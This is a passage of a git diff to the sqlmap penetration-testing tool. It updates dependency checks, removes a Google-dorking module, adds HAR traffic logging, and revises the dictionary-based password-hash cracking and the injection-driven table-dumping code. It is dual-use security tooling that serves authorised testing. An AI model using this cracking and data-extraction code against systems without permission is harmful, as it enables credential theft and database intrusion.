= readInput(message, default="N") - kb.storeCrawlingChoice = test[0] in ("y", "Y") + + kb.storeCrawlingChoice = readInput(message, default='N', boolean=True) if kb.storeCrawlingChoice: - handle, filename = tempfile.mkstemp(prefix="sqlmapcrawling-", suffix=".csv" if conf.forms else ".txt") + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CRAWLER, suffix=".csv" if conf.forms else ".txt") os.close(handle) infoMsg = "writing crawling results to a temporary file '%s' " % filename diff --git 
a/lib/utils/deps.py b/lib/utils/deps.py index efca6e1c3..391dd0f63 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -19,35 +19,37 @@ def checkDependencies(): try: if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): - import _mssql - import pymssql + __import__("_mssql") + import pymssql if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": warnMsg = "'%s' third-party library must be " % data[1] warnMsg += "version >= 1.0.2 to work properly. " warnMsg += "Download from %s" % data[2] logger.warn(warnMsg) elif dbmsName == DBMS.MYSQL: - import pymysql + __import__("pymysql") elif dbmsName == DBMS.PGSQL: - import psycopg2 + __import__("psycopg2") elif dbmsName == DBMS.ORACLE: - import cx_Oracle + __import__("cx_Oracle") elif dbmsName == DBMS.SQLITE: - import sqlite3 + __import__("sqlite3") elif dbmsName == DBMS.ACCESS: - import pyodbc + __import__("pyodbc") elif dbmsName == DBMS.FIREBIRD: - import kinterbasdb + __import__("kinterbasdb") elif dbmsName == DBMS.DB2: - import ibm_db_dbi + __import__("ibm_db_dbi") elif dbmsName == DBMS.HSQLDB: - import jaydebeapi - import jpype + __import__("jaydebeapi") + __import__("jpype") + elif dbmsName == DBMS.INFORMIX: + __import__("ibm_db_dbi") except ImportError: warnMsg = "sqlmap requires '%s' third-party library " % data[1] warnMsg += "in order to directly connect to the DBMS " - warnMsg += "%s. Download from %s" % (dbmsName, data[2]) + warnMsg += "'%s'. Download from %s" % (dbmsName, data[2]) logger.warn(warnMsg) missing_libraries.add(data[1]) @@ -57,7 +59,7 @@ def checkDependencies(): logger.debug(debugMsg) try: - import impacket + __import__("impacket") debugMsg = "'python-impacket' third-party library is found" logger.debug(debugMsg) except ImportError: @@ -68,7 +70,7 @@ def checkDependencies(): missing_libraries.add('python-impacket') try: - import ntlm + __import__("ntlm") debugMsg = "'python-ntlm' third-party library is found" logger.debug(debugMsg) except ImportError: @@ -79,7 +81,7 @@ def checkDependencies(): missing_libraries.add('python-ntlm') try: - from websocket import ABNF + __import__("websocket.ABNF") debugMsg = "'python websocket-client' library is found" logger.debug(debugMsg) except ImportError: @@ -91,7 +93,7 @@ def checkDependencies(): if IS_WIN: try: - import pyreadline + __import__("pyreadline") debugMsg = "'python-pyreadline' third-party library is found" logger.debug(debugMsg) except ImportError: diff --git a/lib/utils/getch.py b/lib/utils/getch.py index af9a56160..cbb67616e 100644 --- a/lib/utils/getch.py +++ b/lib/utils/getch.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/utils/google.py b/lib/utils/google.py deleted file mode 100644 index b12de7ced..000000000 --- a/lib/utils/google.py +++ /dev/null @@ -1,161 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import httplib -import re -import socket -import urllib -import urllib2 - -from lib.core.common import getUnicode -from lib.core.common import readInput -from lib.core.common import urlencode -from lib.core.data 
import conf -from lib.core.data import logger -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTP_HEADER -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapGenericException -from lib.core.settings import GOOGLE_REGEX -from lib.core.settings import DUCKDUCKGO_REGEX -from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE -from lib.core.settings import UNICODE_ENCODING -from lib.request.basic import decodePage -from lib.request.httpshandler import HTTPSHandler - -class Google(object): - """ - This class defines methods used to perform Google dorking (command - line option '-g <google dork>' - """ - - def __init__(self, handlers): - self._cj = cookielib.CookieJar() - - handlers.append(urllib2.HTTPCookieProcessor(self._cj)) - handlers.append(HTTPSHandler()) - - self.opener = urllib2.build_opener(*handlers) - self.opener.addheaders = conf.httpHeaders - - try: - conn = self.opener.open("http://www.google.com/ncr") - conn.info() # retrieve session cookie - except Exception, ex: - errMsg = "unable to connect to Google ('%s')" % ex - raise SqlmapConnectionException(errMsg) - - def search(self, dork): - """ - This method performs the effective search on Google providing - the google dork and the Google session cookie - """ - - gpage = conf.googlePage if conf.googlePage > 1 else 1 - logger.info("using Google result page #%d" % gpage) - - if not dork: - return None - - url = "http://www.google.com/search?" - url += "q=%s&" % urlencode(dork, convall=True) - url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" - url += "&start=%d" % ((gpage - 1) * 100) - - try: - conn = self.opener.open(url) - - requestMsg = "HTTP request:\nGET %s" % url - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - page = conn.read() - code = conn.code - status = conn.msg - responseHeaders = conn.info() - page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) - - responseMsg = "HTTP response (%s - %d):\n" % (status, code) - - if conf.verbose <= 4: - responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) - elif conf.verbose > 4: - responseMsg += "%s\n%s\n" % (responseHeaders, page) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - except urllib2.HTTPError, e: - try: - page = e.read() - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code - logger.critical(warnMsg) - return None - except (urllib2.URLError, socket.error, socket.timeout): - errMsg = "unable to connect to Google" - raise SqlmapConnectionException(errMsg) - - retVal = [urllib.unquote(match.group(1)) for match in re.finditer(GOOGLE_REGEX, page, re.I | re.S)] - - if not retVal and "detected unusual traffic" in page: - warnMsg = "Google has detected 'unusual' traffic from " - warnMsg += "used IP address disabling further searches" - raise SqlmapGenericException(warnMsg) - - if not retVal: - message = "no usable links found. " - message += "do you want to (re)try with DuckDuckGo? [Y/n] " - output = readInput(message, default="Y") - - if output.strip().lower() != 'n': - url = "https://duckduckgo.com/d.js?" 
- url += "q=%s&p=%d&s=100" % (urlencode(dork, convall=True), gpage) - - if not conf.randomAgent: - self.opener.addheaders = [_ for _ in self.opener.addheaders if _[0].lower() != HTTP_HEADER.USER_AGENT.lower()] - self.opener.addheaders.append((HTTP_HEADER.USER_AGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0")) - - self.opener.addheaders = [_ for _ in self.opener.addheaders if _[0].lower() != HTTP_HEADER.ACCEPT_ENCODING.lower()] - self.opener.addheaders.append((HTTP_HEADER.ACCEPT_ENCODING, HTTP_ACCEPT_ENCODING_HEADER_VALUE)) - - try: - conn = self.opener.open(url) - - requestMsg = "HTTP request:\nGET %s" % url - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) - - page = conn.read() - code = conn.code - status = conn.msg - responseHeaders = conn.info() - page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) - - responseMsg = "HTTP response (%s - %d):\n" % (status, code) - - if conf.verbose <= 4: - responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) - elif conf.verbose > 4: - responseMsg += "%s\n%s\n" % (responseHeaders, page) - - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - except urllib2.HTTPError, e: - try: - page = e.read() - except socket.timeout: - warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code - logger.critical(warnMsg) - return None - except: - errMsg = "unable to connect to DuckDuckGo" - raise SqlmapConnectionException(errMsg) - - retVal = [urllib.unquote(match.group(1)) for match in re.finditer(DUCKDUCKGO_REGEX, page, re.I | re.S)] - - return retVal diff --git a/lib/utils/har.py b/lib/utils/har.py new file mode 100644 index 000000000..5630ec4d2 --- /dev/null +++ b/lib/utils/har.py @@ -0,0 +1,194 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import base64 +import BaseHTTPServer +import httplib +import re +import StringIO + +from lib.core.data import logger +from lib.core.settings import VERSION + +class HTTPCollectorFactory: + def __init__(self, harFile=False): + self.harFile = harFile + + def create(self): + collector = HTTPCollector() + + return collector + +class HTTPCollector: + def __init__(self): + self.messages = [] + + def collectRequest(self, requestMessage, responseMessage): + self.messages.append(RawPair(requestMessage, responseMessage)) + + def obtain(self): + return {"log": { + "version": "1.2", + "creator": {"name": "sqlmap", "version": VERSION}, + "entries": [pair.toEntry().toDict() for pair in self.messages], + }} + +class RawPair: + def __init__(self, request, response): + self.request = request + self.response = response + + def toEntry(self): + return Entry(request=Request.parse(self.request), + response=Response.parse(self.response)) + +class Entry: + def __init__(self, request, response): + self.request = request + self.response = response + + def toDict(self): + return { + "request": self.request.toDict(), + "response": self.response.toDict(), + } + +class Request: + def __init__(self, method, path, httpVersion, headers, postBody=None, raw=None, comment=None): + self.method = method + self.path = path + self.httpVersion = httpVersion + self.headers = headers or {} + self.postBody = postBody + self.comment = comment + self.raw = raw + + @classmethod + def parse(cls, raw): + request = HTTPRequest(raw) + return 
cls(method=request.command, + path=request.path, + httpVersion=request.request_version, + headers=request.headers, + postBody=request.rfile.read(), + comment=request.comment, + raw=raw) + + @property + def url(self): + host = self.headers.get("Host", "unknown") + return "http://%s%s" % (host, self.path) + + def toDict(self): + out = { + "httpVersion": self.httpVersion, + "method": self.method, + "url": self.url, + "headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items()], + "comment": self.comment, + } + + if self.postBody: + contentType = self.headers.get("Content-Type") + out["postData"] = { + "mimeType": contentType, + "text": self.postBody.rstrip("\r\n"), + } + + return out + +class Response: + extract_status = re.compile(r'\((\d{3}) (.*)\)') + + def __init__(self, httpVersion, status, statusText, headers, content, raw=None, comment=None): + self.raw = raw + self.httpVersion = httpVersion + self.status = status + self.statusText = statusText + self.headers = headers + self.content = content + self.comment = comment + + @classmethod + def parse(cls, raw): + altered = raw + comment = None + + if altered.startswith("HTTP response ["): + io = StringIO.StringIO(raw) + first_line = io.readline() + parts = cls.extract_status.search(first_line) + status_line = "HTTP/1.0 %s %s" % (parts.group(1), parts.group(2)) + remain = io.read() + altered = status_line + "\n" + remain + comment = first_line + + response = httplib.HTTPResponse(FakeSocket(altered)) + response.begin() + + try: + content = response.read(-1) + except httplib.IncompleteRead: + content = raw[raw.find("\n\n") + 2:].rstrip("\r\n") + + return cls(httpVersion="HTTP/1.1" if response.version == 11 else "HTTP/1.0", + status=response.status, + statusText=response.reason, + headers=response.msg, + content=content, + comment=comment, + raw=raw) + + def toDict(self): + content = { + "mimeType": self.headers.get("Content-Type"), + "text": self.content, + } + + binary = set(['\0', '\1']) + if any(c in binary for c in self.content): + content["encoding"] = "base64" + content["text"] = base64.b64encode(self.content) + + return { + "httpVersion": self.httpVersion, + "status": self.status, + "statusText": self.statusText, + "headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items() if key.lower() != "uri"], + "content": content, + "comment": self.comment, + } + +class FakeSocket: + # Original source: + # https://stackoverflow.com/questions/24728088/python-parse-http-response-string + + def __init__(self, response_text): + self._file = StringIO.StringIO(response_text) + + def makefile(self, *args, **kwargs): + return self._file + +class HTTPRequest(BaseHTTPServer.BaseHTTPRequestHandler): + # Original source: + # https://stackoverflow.com/questions/4685217/parse-raw-http-headers + + def __init__(self, request_text): + self.comment = None + self.rfile = StringIO.StringIO(request_text) + self.raw_requestline = self.rfile.readline() + + if self.raw_requestline.startswith("HTTP request ["): + self.comment = self.raw_requestline + self.raw_requestline = self.rfile.readline() + + self.error_code = self.error_message = None + self.parse_request() + + def send_error(self, code, message): + self.error_code = code + self.error_message = message diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 69994d23e..039adb68e 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright 
(c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -30,6 +30,7 @@ import os import re import tempfile import time +import zipfile from hashlib import md5 from hashlib import sha1 @@ -44,6 +45,7 @@ from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getFileItems from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite @@ -60,6 +62,8 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS from lib.core.enums import HASH +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import COMMON_PASSWORD_SUFFIXES from lib.core.settings import COMMON_USER_COLUMNS @@ -123,6 +127,13 @@ def postgres_passwd(password, username, uppercase=False): 'md599e5ea7a6f7c3269995cba3927fd0093' """ + + if isinstance(username, unicode): + username = unicode.encode(username, UNICODE_ENCODING) + + if isinstance(password, unicode): + password = unicode.encode(password, UNICODE_ENCODING) + retVal = "md5%s" % md5(password + username).hexdigest() return retVal.upper() if uppercase else retVal.lower() @@ -207,7 +218,10 @@ def oracle_old_passwd(password, username, uppercase=True): # prior to version ' IV, pad = "\0" * 8, "\0" if isinstance(username, unicode): - username = unicode.encode(username, UNICODE_ENCODING) # pyDes has issues with unicode strings + username = unicode.encode(username, UNICODE_ENCODING) + + if isinstance(password, unicode): + password = unicode.encode(password, UNICODE_ENCODING) unistr = "".join("\0%s" % c for c in (username + password).upper()) @@ -327,8 +341,11 @@ def wordpress_passwd(password, salt, count, prefix, uppercase=False): return output + if isinstance(password, unicode): + password = password.encode(UNICODE_ENCODING) + cipher = md5(salt) - cipher.update(password.encode(UNICODE_ENCODING)) + cipher.update(password) hash_ = cipher.digest() for i in xrange(count): @@ -365,13 +382,13 @@ def storeHashesToFile(attack_dict): if kb.storeHashesChoice is None: message = "do you want to store hashes to a temporary file " message += "for eventual further processing with other tools [y/N] " - test = readInput(message, default="N") - kb.storeHashesChoice = test[0] in ("y", "Y") + + kb.storeHashesChoice = readInput(message, default='N', boolean=True) if not kb.storeHashesChoice: return - handle, filename = tempfile.mkstemp(prefix="sqlmaphashes-", suffix=".txt") + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=".txt") os.close(handle) infoMsg = "writing hashes to a temporary file '%s' " % filename @@ -465,11 +482,11 @@ def attackDumpedTable(): storeHashesToFile(attack_dict) message = "do you want to crack them via a dictionary-based attack? 
%s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]") - test = readInput(message, default="N" if conf.multipleTargets else "Y") + choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException results = dictionaryAttack(attack_dict) @@ -488,7 +505,7 @@ def attackDumpedTable(): value = table[column]['values'][i] if value and value.lower() in lut: - table[column]['values'][i] += " (%s)" % lut[value.lower()] + table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()])) table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) def hashRecognition(value): @@ -512,7 +529,7 @@ def hashRecognition(value): return retVal -def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): +def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist, api): if IS_WIN: coloramainit() @@ -566,7 +583,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) - if not hasattr(conf, "api"): + if not api: dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: @@ -588,7 +605,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc with proc_count.get_lock(): proc_count.value -= 1 -def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): +def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api): if IS_WIN: coloramainit() @@ -640,7 +657,7 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found if user and not user.startswith(DUMMY_USER_PREFIX): status += ' (user: %s)' % user - if not hasattr(conf, "api"): + if not api: dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: @@ -668,8 +685,9 @@ def dictionaryAttack(attack_dict): hash_regexes = [] results = [] resumes = [] - processException = False user_hash = [] + processException = False + foundHash = False for (_, hashes) in attack_dict.items(): for hash_ in hashes: @@ -693,6 +711,7 @@ def dictionaryAttack(attack_dict): if not hash_: continue + foundHash = True hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): @@ -705,14 +724,18 @@ def dictionaryAttack(attack_dict): item = [(user, hash_), {}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] - elif hash_regex in (HASH.ORACLE): + elif hash_regex in (HASH.ORACLE,): item = [(user, hash_), {'salt': hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {'salt': hash_[6:14]}] - elif hash_regex in (HASH.CRYPT_GENERIC): + elif hash_regex in (HASH.CRYPT_GENERIC,): item = [(user, hash_), {'salt': hash_[0:2]}] - elif hash_regex in (HASH.WORDPRESS): - item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] + elif hash_regex in (HASH.WORDPRESS,): + if ITOA64.index(hash_[3]) < 32: + item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] + else: + warnMsg = 
"invalid hash '%s'" % hash_ + logger.warn(warnMsg) if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) @@ -743,20 +766,20 @@ def dictionaryAttack(attack_dict): message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" - choice = readInput(message, default="1") + choice = readInput(message, default='1') try: - if choice == "2": + if choice == '2': message = "what's the custom dictionary's location?\n" - dictPaths = [readInput(message)] - - logger.info("using custom dictionary") - elif choice == "3": + _ = readInput(message) + if _: + dictPaths = [readInput(message)] + logger.info("using custom dictionary") + elif choice == '3': message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) - logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") @@ -766,17 +789,24 @@ def dictionaryAttack(attack_dict): for dictPath in dictPaths: checkFile(dictPath) + if os.path.splitext(dictPath)[1].lower() == ".zip": + _ = zipfile.ZipFile(dictPath, 'r') + if len(_.namelist()) == 0: + errMsg = "no file(s) inside '%s'" % dictPath + raise SqlmapDataException(errMsg) + else: + _.open(_.namelist()[0]) + kb.wordlists = dictPaths except Exception, ex: warnMsg = "there was a problem while loading dictionaries" - warnMsg += " ('%s')" % ex.message + warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " - test = readInput(message, default="N") - if test[0] in ("y", "Y"): + if readInput(message, default='N', boolean=True): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name @@ -812,12 +842,12 @@ def dictionaryAttack(attack_dict): count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) + process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api)) + processes.append(process) - for p in processes: - p.daemon = True - p.start() + for process in processes: + process.daemon = True + process.start() while count.value > 0: time.sleep(0.5) @@ -828,7 +858,7 @@ def dictionaryAttack(attack_dict): singleTimeWarnMessage(warnMsg) retVal = Queue() - _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) + _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api) except KeyboardInterrupt: print @@ -896,12 +926,12 @@ def dictionaryAttack(attack_dict): count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) + process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api)) + processes.append(process) - for p in processes: - p.daemon = True - p.start() + for process in 
processes: + process.daemon = True + process.start() while count.value > 0: time.sleep(0.5) @@ -920,7 +950,7 @@ def dictionaryAttack(attack_dict): found_ = Value() found_.value = False - _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) + _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api) found = found_.value @@ -955,9 +985,8 @@ def dictionaryAttack(attack_dict): results.extend(resumes) - if len(hash_regexes) == 0: - warnMsg = "unknown hash format. " - warnMsg += "Please report by e-mail to 'dev@sqlmap.org'" + if foundHash and len(hash_regexes) == 0: + warnMsg = "unknown hash format" logger.warn(warnMsg) if len(results) == 0: diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index 3f20432d9..f86d779d9 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,14 +11,17 @@ import sqlite3 import threading import time +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import serializeObject +from lib.core.common import singleTimeWarnMessage from lib.core.common import unserializeObject from lib.core.data import logger -from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapConnectionException from lib.core.settings import HASHDB_END_TRANSACTION_RETRIES from lib.core.settings import HASHDB_FLUSH_RETRIES from lib.core.settings import HASHDB_FLUSH_THRESHOLD +from lib.core.settings import HASHDB_RETRIEVE_RETRIES from lib.core.settings import UNICODE_ENCODING from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadName @@ -37,10 +40,11 @@ class HashDB(object): connection = sqlite3.connect(self.filepath, timeout=3, isolation_level=None) threadData.hashDBCursor = connection.cursor() threadData.hashDBCursor.execute("CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)") + connection.commit() except Exception, ex: errMsg = "error occurred while opening a session " - errMsg += "file '%s' ('%s')" % (self.filepath, ex) - raise SqlmapDataException(errMsg) + errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) return threadData.hashDBCursor @@ -63,29 +67,47 @@ class HashDB(object): @staticmethod def hashKey(key): key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key) - retVal = int(hashlib.md5(key).hexdigest()[:12], 16) + retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff # Reference: http://stackoverflow.com/a/4448400 return retVal def retrieve(self, key, unserialize=False): retVal = None + if key and (self._write_cache or os.path.isfile(self.filepath)): hash_ = HashDB.hashKey(key) retVal = self._write_cache.get(hash_) if not retVal: - while True: + for _ in xrange(HASHDB_RETRIEVE_RETRIES): try: for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)): retVal = row[0] except sqlite3.OperationalError, ex: - if not "locked" in ex.message: + if any(_ in getSafeExString(ex) for _ in ("locked", "no such table")): + warnMsg = "problem occurred while accessing session file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + singleTimeWarnMessage(warnMsg) + elif "Could not 
decode" in getSafeExString(ex): + break + else: raise except sqlite3.DatabaseError, ex: - errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, ex) + errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, getSafeExString(ex)) errMsg += "If the problem persists please rerun with `--flush-session`" - raise SqlmapDataException, errMsg + raise SqlmapConnectionException, errMsg else: break - return retVal if not unserialize else unserializeObject(retVal) + + time.sleep(1) + + if retVal and unserialize: + try: + retVal = unserializeObject(retVal) + except: + retVal = None + warnMsg = "error occurred while unserializing value for session key '%s'. " % key + warnMsg += "If the problem persists please rerun with `--flush-session`" + logger.warn(warnMsg) + + return retVal def write(self, key, value, serialize=False): if key: @@ -127,7 +149,7 @@ class HashDB(object): if retries == 0: warnMsg = "there has been a problem while writing to " - warnMsg += "the session file ('%s')" % ex.message + warnMsg += "the session file ('%s')" % getSafeExString(ex) logger.warn(warnMsg) if retries >= HASHDB_FLUSH_RETRIES: diff --git a/lib/utils/htmlentities.py b/lib/utils/htmlentities.py index 951c5c4a2..bc9d73c31 100644 --- a/lib/utils/htmlentities.py +++ b/lib/utils/htmlentities.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index 392c3aaf9..99bf4b4a6 100644 --- a/lib/utils/pivotdumptable.py +++ b/lib/utils/pivotdumptable.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,14 +11,17 @@ from extra.safe2bin.safe2bin import safechardecode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend +from lib.core.common import getUnicode from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.dicts import DUMP_REPLACEMENTS from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.exception import SqlmapConnectionException @@ -38,7 +41,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): if count is None: query = dumpNode.count % table - query = whereQuery(query) + query = agent.whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) if isinstance(count, basestring) and count.isdigit(): @@ -64,15 +67,19 @@ def pivotDumpTable(table, colList, count=None, blind=True): colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT)) if conf.pivotColumn: - if any(re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I) for _ in colList): - infoMsg = "using column '%s' as a pivot " % conf.pivotColumn - infoMsg += "for retrieving row data" - 
logger.info(infoMsg) + for _ in colList: + if re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I): + infoMsg = "using column '%s' as a pivot " % conf.pivotColumn + infoMsg += "for retrieving row data" + logger.info(infoMsg) - validPivotValue = True - colList.remove(conf.pivotColumn) - colList.insert(0, conf.pivotColumn) - else: + colList.remove(_) + colList.insert(0, _) + + validPivotValue = True + break + + if not validPivotValue: warnMsg = "column '%s' not " % conf.pivotColumn warnMsg += "found in table '%s'" % table logger.warn(warnMsg) @@ -84,7 +91,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): logger.info(infoMsg) query = dumpNode.count2 % (column, table) - query = whereQuery(query) + query = agent.whereQuery(query) value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(value): @@ -112,29 +119,32 @@ def pivotDumpTable(table, colList, count=None, blind=True): pivotValue = " " breakRetrieval = False + def _(column, pivotValue): + if column == colList[0]: + query = dumpNode.query.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) + else: + query = dumpNode.query2.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False)) + + query = agent.whereQuery(query) + return unArrayizeValue(inject.getValue(query, blind=blind, 